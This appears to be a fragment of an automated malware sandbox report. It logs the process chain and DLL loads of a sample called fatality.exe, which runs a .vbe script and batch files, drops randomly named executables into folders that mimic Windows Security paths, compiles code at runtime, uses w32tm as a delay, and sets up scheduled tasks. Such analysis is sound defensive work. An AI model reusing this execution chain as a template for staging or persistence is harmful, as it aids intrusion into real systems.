                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\blockcomSession\mQBLhXIPAJ.exe "C:\blockcomSession\mQBLhXIPAJ.exe"
                                    Source: unknownProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession\containerReview.exe"
                                    Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP"Jump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\dbg\containerReview.exe "C:\Users\All Users\dbg\containerReview.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\blockcomSession\mQBLhXIPAJ.exe "C:\blockcomSession\mQBLhXIPAJ.exe"
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: shfolder.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: iconcodecservice.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: version.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: version.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: mscoree.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: version.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: uxtheme.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: windows.storage.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
